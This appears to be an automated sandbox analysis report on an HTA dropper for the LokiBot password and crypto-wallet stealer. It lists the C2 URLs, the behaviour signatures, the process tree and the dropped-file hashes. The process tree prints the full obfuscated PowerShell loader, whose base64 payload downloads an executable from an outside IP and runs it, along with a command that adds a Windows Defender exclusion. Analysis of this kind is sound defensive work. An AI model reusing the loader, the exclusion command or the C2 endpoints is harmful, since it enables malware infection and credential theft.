Analysis

  • max time kernel
    278s
  • max time network
    279s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 09:43

General

  • Target

    19112024_0943_seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta

  • Size

    178KB

  • MD5

    a54bdd270a424ec79b735ef6b513c2e4

  • SHA1

    465738a3e31b16ad80c44f3dc7bdd762e402cb51

  • SHA256

    dbcbb51e8c114fa8a7b9a1da2bbba100994eea4ed407bc338dedec5f811ade21

  • SHA512

    598f303f9f570851f3e538dcd5d9e23717e177b3e652320a7d58dc4800a0f81d9445b719e51b0875b640460c1b4d6be7a592e738b1004c2c0490bffac8ba0c61

  • SSDEEP

    96:4vCl1722AAZtbZfjdDINnmScJXD65zbfKZ/UQ:4vCld22AAVjBIcyzbfyUQ

Malware Config

Extracted

Family

lokibot

C2

http://94.156.177.41/maxzi/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Lokibot family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\19112024_0943_seemefasterthanbeforewithhisbestthingsinonlineforgetreadyfor.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE
      "C:\Windows\SysTEM32\winDoWSPOwErshELl\v1.0\pOWERSHELl.exE" "PowERShell.EXE -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT ; iNvOkE-EXprEssion($(invOkE-exPreSSIoN('[sYsteM.tEXT.EncOdInG]'+[CHar]0X3A+[CHaR]0x3A+'Utf8.GEtsTriNG([sYSTEm.CONvErT]'+[ChAr]0x3a+[CHar]58+'fROMbasE64string('+[char]34+'JEFIQ2MxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJlUkRlRmlOaVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3piR3Ysc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZEdvU2hpRWwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZZTGlNem4sSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYkcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNQmdOa1F0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBLWHhFWHhxZEVFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRBSENjMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzY2LjYzLjE4Ny4yMzEvNjU3L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtTVGFSVC1zbGVFcCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXGNhc3BvbC5leGUi'+[ChAR]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:552
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSS -nOP -W 1 -c DevIcEcREDeNTiALDePLoYmENT
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2760
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\091fxpq0.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1100
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD605.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD604.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2892
      • C:\Users\Admin\AppData\Roaming\caspol.exe
        "C:\Users\Admin\AppData\Roaming\caspol.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1628
        • C:\Users\Admin\AppData\Roaming\caspol.exe
          "C:\Users\Admin\AppData\Roaming\caspol.exe"
          4⤵
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:2424

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\091fxpq0.dll

    Filesize

    3KB

    MD5

    7362a261e1329c8580c1480db7e14bbf

    SHA1

    f9f07e4573a73d2b7e7fd5c874459ea9f10b51a0

    SHA256

    c5fe377332d220dd2df51920fc609fda1db3534d39f8f1bf8ab5d6e83a938060

    SHA512

    7420fd07d667b28ea9da0f23307438a48adff801a74b1b51676095bc8a1ded9e09a43a2dd3d03f98977ade9de9a109ce77c9eacaabcba0465aea6f2338d7a37f

  • C:\Users\Admin\AppData\Local\Temp\091fxpq0.pdb

    Filesize

    7KB

    MD5

    789ee44e89cfe792e5724fd06d322a6b

    SHA1

    2c466881760bb316ff82d51fc3b2cdcf51db4d69

    SHA256

    8e2a9d70d843e01ed46f6e408d82d26d7c96099d7b424e44e55009b8eae3e138

    SHA512

    6e400c7311a6ab10e3bbfa80a7bac1e46fec471e81d101b0ddbb64cb4377878385721218fdc7baed02ec1741d7737660bd6333530fcaff95da182d8106ca1d18

  • C:\Users\Admin\AppData\Local\Temp\RESD605.tmp

    Filesize

    1KB

    MD5

    df2dcae5583d0c218fd1ad2e0ca0e47a

    SHA1

    3764699e3418d529dc1f4a6811aef0691639a619

    SHA256

    2fde34bc92d401379fb095b9283a2faadd13b7121f705f859a66ac9b08833914

    SHA512

    f4d0c5007b653420079819950bf6d8e204c4b7d7660eea612868fcec5c00556b9e2bdf0a328c6487d01f05696b5b281f0ccc22dadad00973afa0190993795040

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99

    Filesize

    46B

    MD5

    d898504a722bff1524134c6ab6a5eaa5

    SHA1

    e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

    SHA256

    878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

    SHA512

    26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-4177215427-74451935-3209572229-1000\0f5007522459c86e95ffcc62f32308f1_bf99bef1-312f-4726-8597-70228ef05e99

    Filesize

    46B

    MD5

    c07225d4e7d01d31042965f048728a0a

    SHA1

    69d70b340fd9f44c89adb9a2278df84faa9906b7

    SHA256

    8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

    SHA512

    23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    03e88e8e1bdafd6d1fefcaea0325f163

    SHA1

    541e0d77b7f487db05528f30909c65367b0a4096

    SHA256

    b1b9aa2949a3068adf9f2b5af34d027e4d050d3e318375fc3a9d1410ee4fb75e

    SHA512

    91390c793ccdb6535da844d3e706fd09240c657d6b05f6378df2b71aa50562658d5b01b3a3f7dfe9813ed18821658e6db5b590a47b4190a9ee600358562417db

  • \??\c:\Users\Admin\AppData\Local\Temp\091fxpq0.0.cs

    Filesize

    477B

    MD5

    f97fc8141f59078b4354b513d3b083ac

    SHA1

    293904ab8d5f38a2f0764ee2e35e97e590d8c737

    SHA256

    f6766cc467b91c9c99186a91d4cc32ebf6803b04c9e82ba8dedd54f9dc25b32e

    SHA512

    87b65e67e76c334c79481d25513fb1696ab86b1d8bf6006b7436a5ba7e522e2101912315c16d92cb0bf0feb86aa9616d5ea1019054c489958ca364947abe879c

  • \??\c:\Users\Admin\AppData\Local\Temp\091fxpq0.cmdline

    Filesize

    309B

    MD5

    20dea8387fc331626278d693ec4d7afe

    SHA1

    89cd5b7de7ece9bfb2d957ecbb8f9661f04097bd

    SHA256

    8e14e4dcdaa6c0748932d4184b9560c7a5d99e9d09dfece00e84bd3cd632cefe

    SHA512

    a04e1f3b612803954dcb8f29366b0b11bcd91b66c6a1cc6916f7d1c864d48bed7bfc2004cb58c10dd591dd745b03314127591f9a055f4ee05a93fdad0b0c81c8

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCD604.tmp

    Filesize

    652B

    MD5

    334187c4447ea5e06009c6bf52095b4e

    SHA1

    a50e9d5f35649531be2ec09e794e469bd6e48397

    SHA256

    82531887a9d167382108eec480954589710a333dcbc5cd59a3999842eec97878

    SHA512

    fa633199ea10ad3dd8b3cc4d714d7e8dcdd9b8cca68746697db499dd600ef5d9a1ef1ea5d295fa465946b40ef2d9e2becf19a1b4eb9908e7b40c681714213f03

  • \Users\Admin\AppData\Roaming\caspol.exe

    Filesize

    506KB

    MD5

    759dd13715bc424308f1d0032ac4b502

    SHA1

    03347c96c50c140192e8df70260d732bea301ebc

    SHA256

    d4c86776bcf1dc4ffd2f51538f3e342216314b76cdba2c2864193350654a9aca

    SHA512

    4197992f4b44ea45c91cb00c7308949560ae24d179e9a14ebc4efb27e1b20abae203b1c8756c211eb9aab9732a3fd04c824bd6bc92510c8de3caea3a8cfa8e55

  • memory/1504-46-0x0000000004F80000-0x0000000004FE4000-memory.dmp

    Filesize

    400KB

  • memory/1504-45-0x00000000004A0000-0x00000000004B2000-memory.dmp

    Filesize

    72KB

  • memory/1504-44-0x0000000000ED0000-0x0000000000F54000-memory.dmp

    Filesize

    528KB

  • memory/2424-58-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2424-53-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2424-51-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2424-49-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2424-47-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2424-55-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2424-57-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/2424-60-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2424-85-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB

  • memory/2424-94-0x0000000000400000-0x00000000004A2000-memory.dmp

    Filesize

    648KB